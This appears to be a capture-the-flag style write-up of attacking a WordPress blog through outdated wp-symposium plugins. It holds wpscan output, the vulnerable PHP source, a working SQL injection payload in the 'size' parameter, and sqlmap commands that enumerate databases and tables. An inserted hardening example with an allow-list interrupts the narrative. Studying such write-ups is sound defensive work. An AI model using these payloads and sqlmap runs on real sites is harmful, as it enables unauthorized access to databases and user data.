0x00 Information gathering

The target URL is a WordPress blog.

Since it is WordPress, run wpscan against it directly.
```
[+] We found 2 plugins:

[+] Name: akismet | Latest version: 3.3.4
 |  Location: http://218.2.197.234:2040/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
 |  Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
 |  Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1
```
Two outdated ("past their prime") plugins were found, both with known vulnerabilities.
```
[!] Title: WP Symposium <= 15.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7902
    Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
    Reference: http://packetstormsecurity.com/files/131801/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
    Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4

[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8140
    Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
    Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8148
    Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8
```
0x01 Exploitation

The CVE-2015-3325 SQL injection is in get_album_item.php of the wp-symposium plugin.
```php
<?php
// get_album_item.php from wp-symposium, as quoted in the writeup (vulnerable version).
include_once('../../../wp-config.php');
global $wpdb;

$iid  = $_REQUEST['iid'];
$size = $_REQUEST['size'];

// $size is concatenated straight into the SELECT list. prepare() below only
// binds the %d placeholder for $iid, so the column expression is never escaped.
$sql   = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));

header("Content-type: image/jpeg");
echo stripslashes($image);
?>
```
The size parameter can be crafted to run an arbitrary SQL query, and the code does no filtering at all. However, when querying column names with a table_name restriction nothing came back, and without the table_name restriction only 1 KB of content is shown because of the file size limit, so the column names of wp_users could not be seen.
```
?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
```
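As an added example (not the plugin's own code), this is how the handler above could be hardened: the column name is taken from a fixed allow-list instead of the request, so prepare() is no longer bypassed by a raw size parameter. The column names in the allow-list are assumed for illustration.

```php
<?php
// Added example, not wp-symposium code: a hardened get_album_item.php.
// The original interpolates $_REQUEST['size'] into the SELECT list before
// calling $wpdb->prepare(), which binds only the %d placeholder for iid.
// SQL identifiers cannot be bound as parameters, so the fix is to map the
// request value onto a fixed set of column names.
include_once('../../../wp-config.php');
global $wpdb;

// Allow-list of selectable columns (names assumed for this example).
$allowed_sizes = array(
    'thumb'  => 'thumb',
    'medium' => 'medium',
    'full'   => 'full',
);

$size = isset($_REQUEST['size']) ? (string) $_REQUEST['size'] : '';
if (!array_key_exists($size, $allowed_sizes)) {
    status_header(400);   // WordPress helper: send a 400 Bad Request
    exit('invalid size');
}
$column = $allowed_sizes[$size];

// iid must be a positive integer; absint() is a WordPress helper.
$iid = isset($_REQUEST['iid']) ? absint($_REQUEST['iid']) : 0;
if ($iid === 0) {
    status_header(400);
    exit('invalid iid');
}

// $column now comes from the allow-list, so interpolating it is safe;
// the row id still goes through prepare() as an integer placeholder.
$table = $wpdb->base_prefix . 'symposium_gallery_items';
$sql   = "SELECT `{$column}` FROM `{$table}` WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));

if ($image === null) {
    status_header(404);
    exit;
}
header('Content-Type: image/jpeg');
echo stripslashes($image);
```

Requests whose size value is not one of the allow-listed keys are rejected before any SQL is built, which is also the condition a web server log review or WAF rule for this endpoint would flag.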
No luck, so this vulnerability was abandoned in favour of the blind injection CVE.
https://www.exploit-db.com/exploits/37822/
The topic_id parameter is vulnerable to blind injection. Visit the corresponding page, save the POST request to a file, and test it with sqlmap. (During testing the sleep function from the exploit was not removed, which made the script run far longer than necessary...)
```
sqlmap -r "E:1.txt" --dbs --level 3
```
```
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress
```
Table names:
```
sqlmap -r "E:1.txt" -D "wordpress" --tables
```